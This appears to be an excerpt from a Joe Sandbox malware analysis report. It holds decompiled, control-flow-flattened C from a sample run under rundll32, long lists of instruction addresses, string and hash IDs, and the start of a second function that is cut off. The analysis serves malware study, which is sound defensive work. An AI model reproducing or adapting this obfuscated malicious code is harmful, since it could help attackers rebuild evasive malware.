                                                                                                                                  							if(_t1317 == 0x3fc5519) {
                                                                                                                                  								_v144 = E002E20B0();
                                                                                                                                  								_t1125 = E002E1DDD(_v452, _t1152, _v636, _v224);
                                                                                                                                  								_pop(_t1237);
                                                                                                                                  								_v140 = _t1125;
                                                                                                                                  								_t1317 = 0xa74297b;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x42dc4f0;
                                                                                                                                  							if(_t1317 == 0x42dc4f0) {
                                                                                                                                  								_t1125 = _v468;
                                                                                                                                  								_t1317 = 0x4cdd8ae;
                                                                                                                                  								_v112 = _t1125;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x4a24b69;
                                                                                                                                  							if(_t1317 == 0x4a24b69) {
                                                                                                                                  								_t1125 = E002E0326();
                                                                                                                                  								_t1317 = 0x8690ed6;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x4cdd8ae;
                                                                                                                                  							if(_t1317 != 0x4cdd8ae) {
                                                                                                                                  								goto L109;
                                                                                                                                  							}
                                                                                                                                  							_t1125 = _v508;
                                                                                                                                  							_t1317 = 0x5dcd6da;
                                                                                                                                  							_v124 = _t1125;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t1349 == 0) {
                                                                                                                                  							E002E8519(_v244, _v352, _v188);
                                                                                                                                  							L34:
                                                                                                                                  							_t1317 = 0xe4333b3;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						_t1350 = _t1317 - 0x27d9d92;
                                                                                                                                  						if(_t1350 > 0) {
                                                                                                                                  							__eflags = _t1317 - 0x2a998d8;
                                                                                                                                  							if(_t1317 == 0x2a998d8) {
                                                                                                                                  								_t1124 = E002D1A56( &_v180,  &_v84, _v572, _v516);
                                                                                                                                  								__eflags = _t1124;
                                                                                                                                  								if(_t1124 != 0) {
                                                                                                                                  									_t1125 = _v28;
                                                                                                                                  									__eflags = _t1125 - 8;
                                                                                                                                  									if(_t1125 != 8) {
                                                                                                                                  										__eflags = _t1125;
                                                                                                                                  										if(_t1125 == 0) {
                                                                                                                                  											L32:
                                                                                                                                  											_t1317 = 0xa65551a;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  										__eflags = _t1125 - 1;
                                                                                                                                  										if(_t1125 != 1) {
                                                                                                                                  											goto L27;
                                                                                                                                  										}
                                                                                                                                  										goto L32;
                                                                                                                                  									}
                                                                                                                                  									_t1317 = 0xc1a4fe5;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								_t1125 = E002E0AE0(_v308, _v564);
                                                                                                                                  								_pop(_t1237);
                                                                                                                                  								_t1314 = _t1125;
                                                                                                                                  								_t1191 = 0x5dcd6da;
                                                                                                                                  								goto L27;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x2cf0ed0;
                                                                                                                                  							if(_t1317 == 0x2cf0ed0) {
                                                                                                                                  								_t1125 = E002ECB5B(_v340, _v248, _v348, _v356);
                                                                                                                                  								goto L114;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x3250d84;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								_v196 = E002E7BA6( &_v192, _v596, __eflags, _v492, 0x2d1444);
                                                                                                                                  								_v204 = E002E7BA6( &_v200, _v316, __eflags, _v344, 0x2d14b4);
                                                                                                                                  								_t1130 = E002D5361(_v460, _v524,  &_v196,  &_v204);
                                                                                                                                  								_t1345 = _t1345 + 0x1c;
                                                                                                                                  								asm("sbb esi, esi");
                                                                                                                                  								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
                                                                                                                                  								E002DA8B0(_v376, _v204, _v424);
                                                                                                                                  								_t1125 = E002DA8B0(_v580, _v196, _v328);
                                                                                                                                  								goto L109;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0x3ace1b1;
                                                                                                                                  							if(_t1317 != 0x3ace1b1) {
                                                                                                                                  								goto L109;
                                                                                                                                  							}
                                                                                                                                  							_t1125 = E002E473C();
                                                                                                                                  							_t1317 = 0xc245297;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t1350 == 0) {
                                                                                                                                  							_t1141 = E002E4116();
                                                                                                                                  							__eflags = _t1141;
                                                                                                                                  							if(_t1141 == 0) {
                                                                                                                                  								_t1125 = E002E1FFB();
                                                                                                                                  								asm("sbb esi, esi");
                                                                                                                                  								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
                                                                                                                                  							} else {
                                                                                                                                  								_t1125 = E002E1FFB();
                                                                                                                                  								asm("sbb esi, esi");
                                                                                                                                  								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
                                                                                                                                  							}
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t1317 == 0xc4dcd) {
                                                                                                                                  							_t1125 = E002E8519(_v440, _v612, _v180);
                                                                                                                                  							_t1317 = 0x3d71c3c;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t1317 == 0x283259) {
                                                                                                                                  							_t1125 = E002D64E2(_v476, _v332, _v252,  &_v188, E002D4E74(), _v232, _v620,  &_v180);
                                                                                                                                  							_t1345 = _t1345 + 0x18;
                                                                                                                                  							asm("sbb esi, esi");
                                                                                                                                  							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t1317 == 0x1b53ec1) {
                                                                                                                                  							_t1125 = E002E87D1();
                                                                                                                                  							_v104 = _t1125;
                                                                                                                                  							_t1317 = 0xfa2c753;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t1317 != 0x1f27ca8) {
                                                                                                                                  							goto L109;
                                                                                                                                  						}
                                                                                                                                  						_t1125 = E002E20BA();
                                                                                                                                  						if(_t1125 == 0) {
                                                                                                                                  							goto L114;
                                                                                                                                  						} else {
                                                                                                                                  							_t1317 = 0xa7d0a44;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t1317 - 0xa7d0a44;
                                                                                                                                  					if(__eflags > 0) {
                                                                                                                                  						__eflags = _t1317 - 0xd7f216f;
                                                                                                                                  						if(__eflags > 0) {
                                                                                                                                  							__eflags = _t1317 - 0xdbd69f4;
                                                                                                                                  							if(_t1317 == 0xdbd69f4) {
                                                                                                                                  								_t1114 = E002E9BCF();
                                                                                                                                  								__eflags = _t1114;
                                                                                                                                  								if(_t1114 != 0) {
                                                                                                                                  									L85:
                                                                                                                                  									_t1317 = 0x2cf0ed0;
                                                                                                                                  									goto L1;
                                                                                                                                  								}
                                                                                                                                  								_t1317 = 0xc7d9b3b;
                                                                                                                                  								goto L109;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0xe4333b3;
                                                                                                                                  							if(_t1317 == 0xe4333b3) {
                                                                                                                                  								__eflags = _t1314 - _v288;
                                                                                                                                  								if(_t1314 == _v288) {
                                                                                                                                  									L106:
                                                                                                                                  									_t1317 = _t1191;
                                                                                                                                  									goto L109;
                                                                                                                                  								}
                                                                                                                                  								_t1134 = E002D4E74();
                                                                                                                                  								_t1237 = _v480;
                                                                                                                                  								_t1125 = E002D8DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
                                                                                                                                  								_t1345 = _t1345 + 0x10;
                                                                                                                                  								__eflags = _t1125 - _v372;
                                                                                                                                  								if(_t1125 == _v372) {
                                                                                                                                  									_t1125 = E002D6D24();
                                                                                                                                  									goto L106;
                                                                                                                                  								}
                                                                                                                                  								_t1317 = 0x942db73;
                                                                                                                                  								goto L1;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t1317 - 0xfa2c753;
                                                                                                                                  							if(_t1317 != 0xfa2c753) {
                                                                                                                                  								goto L109;
                                                                                                                                  							}
                                                                                                                                  							_t1125 = E002ED2CE(_t1237);
                                                                                                                                  							_v172 = _t1125;
                                                                                                                                  							_t1317 = 0x42dc4f0;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							_t1125 = E002E7D48(_t1237, __eflags);
                                                                                                                                  							__eflags = _t1125;
                                                                                                                                  							if(_t1125 == 0) {
                                                                                                                                  								goto L114;
                                                                                                                                  							}
                                                                                                                                  							_t1317 = 0x4a24b69;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0xb2497b0;
                                                                                                                                  						if(_t1317 == 0xb2497b0) {
                                                                                                                                  							_t1125 = E002DDFF3();
                                                                                                                                  							_t1317 = 0x3250d84;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0xc1a4fe5;
                                                                                                                                  						if(_t1317 == 0xc1a4fe5) {
                                                                                                                                  							_t1125 = E002E7DD5();
                                                                                                                                  							goto L114;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0xc245297;
                                                                                                                                  						if(_t1317 == 0xc245297) {
                                                                                                                                  							_t1125 = E002E8BE3();
                                                                                                                                  							_t1317 = 0x6397bd0;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0xc7d9b3b;
                                                                                                                                  						if(_t1317 != 0xc7d9b3b) {
                                                                                                                                  							goto L109;
                                                                                                                                  						}
                                                                                                                                  						_t1125 = E002D51BB();
                                                                                                                                  						_t1317 = 0xb2497b0;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						_t1125 = E002E9EEC();
                                                                                                                                  						asm("sbb esi, esi");
                                                                                                                                  						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t1317 - 0x8955e2f;
                                                                                                                                  					if(__eflags > 0) {
                                                                                                                                  						__eflags = _t1317 - 0x8c1c67e;
                                                                                                                                  						if(_t1317 == 0x8c1c67e) {
                                                                                                                                  							_t1125 = E002E1EE7();
                                                                                                                                  							goto L85;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0x942db73;
                                                                                                                                  						if(_t1317 == 0x942db73) {
                                                                                                                                  							_t1125 = E002D91B0(_t1237);
                                                                                                                                  							goto L114;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0xa65551a;
                                                                                                                                  						if(_t1317 == 0xa65551a) {
                                                                                                                                  							_t1125 = E002DB2C7(_v412, _v268,  &_v36);
                                                                                                                                  							_pop(_t1237);
                                                                                                                                  							__eflags = _t1125;
                                                                                                                                  							if(_t1125 == 0) {
                                                                                                                                  								_t1125 = _v28;
                                                                                                                                  								__eflags = _t1125;
                                                                                                                                  								if(_t1125 == 0) {
                                                                                                                                  									_t1314 = E002E0AE0(_v260, _v208);
                                                                                                                                  									_t1125 = _v28;
                                                                                                                                  									_pop(_t1237);
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t1125 - 1;
                                                                                                                                  								if(_t1125 == 1) {
                                                                                                                                  									_t1125 = E002E0AE0(_v528, _v536);
                                                                                                                                  									_pop(_t1237);
                                                                                                                                  									_t1314 = _t1125;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t1314 = _v560;
                                                                                                                                  							}
                                                                                                                                  							_t1191 = 0x5dcd6da;
                                                                                                                                  							_t1317 = 0x53c3717;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t1317 - 0xa74297b;
                                                                                                                                  						if(_t1317 != 0xa74297b) {
                                                                                                                                  							goto L109;
                                                                                                                                  						}
                                                                                                                                  						_t1125 = E002D75F1();
                                                                                                                                  						_v100 = _t1125;
                                                                                                                                  						_t1317 = 0x1b53ec1;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						_t1125 = E002EE1D4();
                                                                                                                                  						__eflags = _t1125;
                                                                                                                                  						if(_t1125 == 0) {
                                                                                                                                  							goto L114;
                                                                                                                                  						}
                                                                                                                                  						_t1317 = 0x1f27ca8;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t1317 - 0x6eeee91;
                                                                                                                                  					if(_t1317 == 0x6eeee91) {
                                                                                                                                  						_t1237 = _v276;
                                                                                                                                  						_t1125 = E002D2251(_v276,  &_v188,  &_v172, _v420, _v428);
                                                                                                                                  						_t1345 = _t1345 + 0xc;
                                                                                                                                  						asm("sbb esi, esi");
                                                                                                                                  						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t1317 - 0x7289877;
                                                                                                                                  					if(_t1317 == 0x7289877) {
                                                                                                                                  						E002EE1D4();
                                                                                                                                  						_t1191 = 0x3fc5519;
                                                                                                                                  						_t1125 = E002E0AE0(_v584, _v436);
                                                                                                                                  						_t1314 = _t1125;
                                                                                                                                  						goto L34;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t1317 - 0x77c68ce;
                                                                                                                                  					if(_t1317 == 0x77c68ce) {
                                                                                                                                  						_t1125 = E002E5CC4();
                                                                                                                                  						_t1317 = 0x8c1c67e;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t1317 - 0x8690ed6;
                                                                                                                                  					if(_t1317 != 0x8690ed6) {
                                                                                                                                  						goto L109;
                                                                                                                                  					}
                                                                                                                                  					_t1125 = E002E044F();
                                                                                                                                  					__eflags = _t1125;
                                                                                                                                  					if(_t1125 == 0) {
                                                                                                                                  						goto L114;
                                                                                                                                  					}
                                                                                                                                  					_t1317 = 0x8955e2f;
                                                                                                                                  					goto L1;
                                                                                                                                  					L109:
                                                                                                                                  					__eflags = _t1317 - 0xccbb739;
                                                                                                                                  				} while (_t1317 != 0xccbb739);
                                                                                                                                  				goto L114;
                                                                                                                                  			}

                                                                                                                                  0x002e2886
                                                                                                                                  0x002e2891
                                                                                                                                  0x002e289c
                                                                                                                                  0x002e28a4
                                                                                                                                  0x002e28ac
                                                                                                                                  0x002e28bc
                                                                                                                                  0x002e28c0
                                                                                                                                  0x002e28c8
                                                                                                                                  0x002e28d8
                                                                                                                                  0x002e28dc
                                                                                                                                  0x002e28e4
                                                                                                                                  0x002e28ec
                                                                                                                                  0x002e28f4
                                                                                                                                  0x002e28fc
                                                                                                                                  0x002e2901
                                                                                                                                  0x002e2906
                                                                                                                                  0x002e290e
                                                                                                                                  0x002e2916
                                                                                                                                  0x002e2928
                                                                                                                                  0x002e292d
                                                                                                                                  0x002e2936
                                                                                                                                  0x002e2941
                                                                                                                                  0x002e294c
                                                                                                                                  0x002e295f
                                                                                                                                  0x002e2960
                                                                                                                                  0x002e2967
                                                                                                                                  0x002e2972
                                                                                                                                  0x002e2985
                                                                                                                                  0x002e298c
                                                                                                                                  0x002e2997
                                                                                                                                  0x002e29ab
                                                                                                                                  0x002e29b2
                                                                                                                                  0x002e29ba
                                                                                                                                  0x002e29c5
                                                                                                                                  0x002e29d0
                                                                                                                                  0x002e29e7
                                                                                                                                  0x002e29ea
                                                                                                                                  0x002e29f1
                                                                                                                                  0x002e29fc
                                                                                                                                  0x002e2a07
                                                                                                                                  0x002e2a12
                                                                                                                                  0x002e2a1d
                                                                                                                                  0x002e2a28
                                                                                                                                  0x002e2a33
                                                                                                                                  0x002e2a3b
                                                                                                                                  0x002e2a46
                                                                                                                                  0x002e2a51
                                                                                                                                  0x002e2a64
                                                                                                                                  0x002e2a6b
                                                                                                                                  0x002e2a72
                                                                                                                                  0x002e2a7d
                                                                                                                                  0x002e2a93
                                                                                                                                  0x002e2a9a
                                                                                                                                  0x002e2aa5
                                                                                                                                  0x002e2ab8
                                                                                                                                  0x002e2abb
                                                                                                                                  0x002e2ac2
                                                                                                                                  0x002e2aca
                                                                                                                                  0x002e2ad5
                                                                                                                                  0x002e2add
                                                                                                                                  0x002e2ae2
                                                                                                                                  0x002e2aea
                                                                                                                                  0x002e2af2
                                                                                                                                  0x002e2b05
                                                                                                                                  0x002e2b0c
                                                                                                                                  0x002e2b17
                                                                                                                                  0x002e2b1f
                                                                                                                                  0x002e2b2a
                                                                                                                                  0x002e2b35
                                                                                                                                  0x002e2b3d
                                                                                                                                  0x002e2b48
                                                                                                                                  0x002e2b53
                                                                                                                                  0x002e2b5a
                                                                                                                                  0x002e2b65
                                                                                                                                  0x002e2b70
                                                                                                                                  0x002e2b83
                                                                                                                                  0x002e2b8a
                                                                                                                                  0x002e2ba0
                                                                                                                                  0x002e2ba7
                                                                                                                                  0x002e2bb2
                                                                                                                                  0x002e2bba
                                                                                                                                  0x002e2bc2
                                                                                                                                  0x002e2bca
                                                                                                                                  0x002e2bcf
                                                                                                                                  0x002e2bd7
                                                                                                                                  0x002e2bea
                                                                                                                                  0x002e2beb
                                                                                                                                  0x002e2bfa
                                                                                                                                  0x002e2c01
                                                                                                                                  0x002e2c08
                                                                                                                                  0x002e2c13
                                                                                                                                  0x002e2c1e
                                                                                                                                  0x002e2c26
                                                                                                                                  0x002e2c31
                                                                                                                                  0x002e2c3c
                                                                                                                                  0x002e2c47
                                                                                                                                  0x002e2c58
                                                                                                                                  0x002e2c5f
                                                                                                                                  0x002e2c6c
                                                                                                                                  0x002e2c74
                                                                                                                                  0x002e2c7c
                                                                                                                                  0x002e2c86
                                                                                                                                  0x002e2c8b
                                                                                                                                  0x002e2c91
                                                                                                                                  0x002e2c99
                                                                                                                                  0x002e2ca4
                                                                                                                                  0x002e2caf
                                                                                                                                  0x002e2cba
                                                                                                                                  0x002e2ccd
                                                                                                                                  0x002e2cce
                                                                                                                                  0x002e2cd5
                                                                                                                                  0x002e2ce0
                                                                                                                                  0x002e2cf3
                                                                                                                                  0x002e2cfa
                                                                                                                                  0x002e2d05
                                                                                                                                  0x002e2d10
                                                                                                                                  0x002e2d1e
                                                                                                                                  0x002e2d22
                                                                                                                                  0x002e2d2a
                                                                                                                                  0x002e2d2f
                                                                                                                                  0x002e2d37
                                                                                                                                  0x002e2d42
                                                                                                                                  0x002e2d4a
                                                                                                                                  0x002e2d55
                                                                                                                                  0x002e2d5d
                                                                                                                                  0x002e2d62
                                                                                                                                  0x002e2d67
                                                                                                                                  0x002e2d6f
                                                                                                                                  0x002e2d77
                                                                                                                                  0x002e2d82
                                                                                                                                  0x002e2d8d
                                                                                                                                  0x002e2d98
                                                                                                                                  0x002e2da3
                                                                                                                                  0x002e2dab
                                                                                                                                  0x002e2db3
                                                                                                                                  0x002e2dbc
                                                                                                                                  0x002e2dc0
                                                                                                                                  0x002e2dc8
                                                                                                                                  0x002e2dd3
                                                                                                                                  0x002e2dde
                                                                                                                                  0x002e2de9
                                                                                                                                  0x002e2df4
                                                                                                                                  0x002e2dff
                                                                                                                                  0x002e2e0a
                                                                                                                                  0x002e2e12
                                                                                                                                  0x002e2e1c
                                                                                                                                  0x002e2e20
                                                                                                                                  0x002e2e28
                                                                                                                                  0x002e2e30
                                                                                                                                  0x002e2e3b
                                                                                                                                  0x002e2e46
                                                                                                                                  0x002e2e51
                                                                                                                                  0x002e2e58
                                                                                                                                  0x002e2e63
                                                                                                                                  0x002e2e6e
                                                                                                                                  0x002e2e79
                                                                                                                                  0x002e2e84
                                                                                                                                  0x002e2e8f
                                                                                                                                  0x002e2e9a
                                                                                                                                  0x002e2ea5
                                                                                                                                  0x002e2eb0
                                                                                                                                  0x002e2ebb
                                                                                                                                  0x002e2ec6
                                                                                                                                  0x002e2ed1
                                                                                                                                  0x002e2edc
                                                                                                                                  0x002e2eef
                                                                                                                                  0x002e2f02
                                                                                                                                  0x002e2f05
                                                                                                                                  0x002e2f0c
                                                                                                                                  0x002e2f17
                                                                                                                                  0x002e2f22
                                                                                                                                  0x002e2f2d
                                                                                                                                  0x002e2f38
                                                                                                                                  0x002e2f4e
                                                                                                                                  0x002e2f55
                                                                                                                                  0x002e2f60
                                                                                                                                  0x002e2f6b
                                                                                                                                  0x002e2f76
                                                                                                                                  0x002e2f81
                                                                                                                                  0x002e2f8c
                                                                                                                                  0x002e2f97
                                                                                                                                  0x002e2fa9
                                                                                                                                  0x002e2fae
                                                                                                                                  0x002e2fb7
                                                                                                                                  0x002e2fc2
                                                                                                                                  0x002e2fcd
                                                                                                                                  0x002e2fd8
                                                                                                                                  0x002e2fe3
                                                                                                                                  0x002e2fee
                                                                                                                                  0x002e2ff9
                                                                                                                                  0x002e3001
                                                                                                                                  0x002e3009
                                                                                                                                  0x002e3011
                                                                                                                                  0x002e301c
                                                                                                                                  0x002e3027
                                                                                                                                  0x002e3032
                                                                                                                                  0x002e303d
                                                                                                                                  0x002e3aa0
                                                                                                                                  0x002e3ae5
                                                                                                                                  0x002e3aec
                                                                                                                                  0x002e3af1
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3af1
                                                                                                                                  0x002e3aa2
                                                                                                                                  0x002e3aa8
                                                                                                                                  0x002e3ad6
                                                                                                                                  0x002e3adb
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3adb
                                                                                                                                  0x002e3aaa
                                                                                                                                  0x002e3ab0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ab6
                                                                                                                                  0x002e3abd
                                                                                                                                  0x002e3abf
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3abf
                                                                                                                                  0x002e3793
                                                                                                                                  0x002e3a70
                                                                                                                                  0x002e3a75
                                                                                                                                  0x002e3a76
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a76
                                                                                                                                  0x002e3799
                                                                                                                                  0x002e379f
                                                                                                                                  0x002e38e1
                                                                                                                                  0x002e38e7
                                                                                                                                  0x002e39f9
                                                                                                                                  0x002e3a00
                                                                                                                                  0x002e3a02
                                                                                                                                  0x002e3a32
                                                                                                                                  0x002e3a39
                                                                                                                                  0x002e3a3c
                                                                                                                                  0x002e3a48
                                                                                                                                  0x002e3a4a
                                                                                                                                  0x002e3a51
                                                                                                                                  0x002e3a51
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a51
                                                                                                                                  0x002e3a4c
                                                                                                                                  0x002e3a4f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a4f
                                                                                                                                  0x002e3a3e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a3e
                                                                                                                                  0x002e3a1d
                                                                                                                                  0x002e3a23
                                                                                                                                  0x002e3a24
                                                                                                                                  0x002e3a26
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a26
                                                                                                                                  0x002e38ed
                                                                                                                                  0x002e38f3
                                                                                                                                  0x002e3fd7
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3fdc
                                                                                                                                  0x002e38f9
                                                                                                                                  0x002e38ff
                                                                                                                                  0x002e3959
                                                                                                                                  0x002e3965
                                                                                                                                  0x002e398e
                                                                                                                                  0x002e3995
                                                                                                                                  0x002e399a
                                                                                                                                  0x002e39b7
                                                                                                                                  0x002e39bd
                                                                                                                                  0x002e39d5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e39da
                                                                                                                                  0x002e3901
                                                                                                                                  0x002e3907
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3914
                                                                                                                                  0x002e3919
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3919
                                                                                                                                  0x002e37a5
                                                                                                                                  0x002e3895
                                                                                                                                  0x002e389a
                                                                                                                                  0x002e389c
                                                                                                                                  0x002e38c5
                                                                                                                                  0x002e38ce
                                                                                                                                  0x002e38d6
                                                                                                                                  0x002e389e
                                                                                                                                  0x002e38a2
                                                                                                                                  0x002e38ab
                                                                                                                                  0x002e38b3
                                                                                                                                  0x002e38b3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e389c
                                                                                                                                  0x002e37b1
                                                                                                                                  0x002e3881
                                                                                                                                  0x002e3887
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3887
                                                                                                                                  0x002e37bd
                                                                                                                                  0x002e3850
                                                                                                                                  0x002e3855
                                                                                                                                  0x002e385c
                                                                                                                                  0x002e3864
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3864
                                                                                                                                  0x002e37c5
                                                                                                                                  0x002e37f6
                                                                                                                                  0x002e37fb
                                                                                                                                  0x002e3802
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3802
                                                                                                                                  0x002e37cd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e37de
                                                                                                                                  0x002e37e5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e37eb
                                                                                                                                  0x002e37eb
                                                                                                                                  0x00000000
                                                                                                                                  0x002e37eb
                                                                                                                                  0x002e37e5
                                                                                                                                  0x002e3c13
                                                                                                                                  0x002e3c19
                                                                                                                                  0x002e3e40
                                                                                                                                  0x002e3e46
                                                                                                                                  0x002e3edd
                                                                                                                                  0x002e3ee3
                                                                                                                                  0x002e3f9b
                                                                                                                                  0x002e3fa0
                                                                                                                                  0x002e3fa2
                                                                                                                                  0x002e3e13
                                                                                                                                  0x002e3e13
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e13
                                                                                                                                  0x002e3fa8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3fa8
                                                                                                                                  0x002e3ee9
                                                                                                                                  0x002e3eef
                                                                                                                                  0x002e3f21
                                                                                                                                  0x002e3f28
                                                                                                                                  0x002e3f89
                                                                                                                                  0x002e3f89
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f89
                                                                                                                                  0x002e3f38
                                                                                                                                  0x002e3f54
                                                                                                                                  0x002e3f5b
                                                                                                                                  0x002e3f60
                                                                                                                                  0x002e3f63
                                                                                                                                  0x002e3f6a
                                                                                                                                  0x002e3f84
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f84
                                                                                                                                  0x002e3f6c
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f6c
                                                                                                                                  0x002e3ef1
                                                                                                                                  0x002e3ef7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f0b
                                                                                                                                  0x002e3f10
                                                                                                                                  0x002e3f17
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f17
                                                                                                                                  0x002e3e4c
                                                                                                                                  0x002e3ec6
                                                                                                                                  0x002e3ecb
                                                                                                                                  0x002e3ecd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ed3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ed3
                                                                                                                                  0x002e3e4e
                                                                                                                                  0x002e3e54
                                                                                                                                  0x002e3ea9
                                                                                                                                  0x002e3eae
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3eae
                                                                                                                                  0x002e3e56
                                                                                                                                  0x002e3e5c
                                                                                                                                  0x002e4004
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4004
                                                                                                                                  0x002e3e62
                                                                                                                                  0x002e3e68
                                                                                                                                  0x002e3e93
                                                                                                                                  0x002e3e98
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e98

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                                  • API String ID: 0-2742041174
                                                                                                                                  • Opcode ID: 5d16f609cefc46e316977bf103c4d6c139bf6f95c8e25fa96db40445ee930701
                                                                                                                                  • Instruction ID: c0d3a07f2e6a03f44f62d3bd02e449b4eb5074c88abf86a87a1b1c4cb0a9a220
                                                                                                                                  • Opcode Fuzzy Hash: 5d16f609cefc46e316977bf103c4d6c139bf6f95c8e25fa96db40445ee930701
                                                                                                                                  • Instruction Fuzzy Hash: 56C222715583818BD378CF25C58ABCBBBE1BB84314F50892EE5DA97260DBB08958CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002D2BD9(intOrPtr __ecx) {
                                                                                                                                  				char _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				char _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				char* _v60;
                                                                                                                                  				intOrPtr _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				intOrPtr _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				char _v80;
                                                                                                                                  				intOrPtr _v84;
                                                                                                                                  				char _v88;
                                                                                                                                  				char _v92;
                                                                                                                                  				char _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
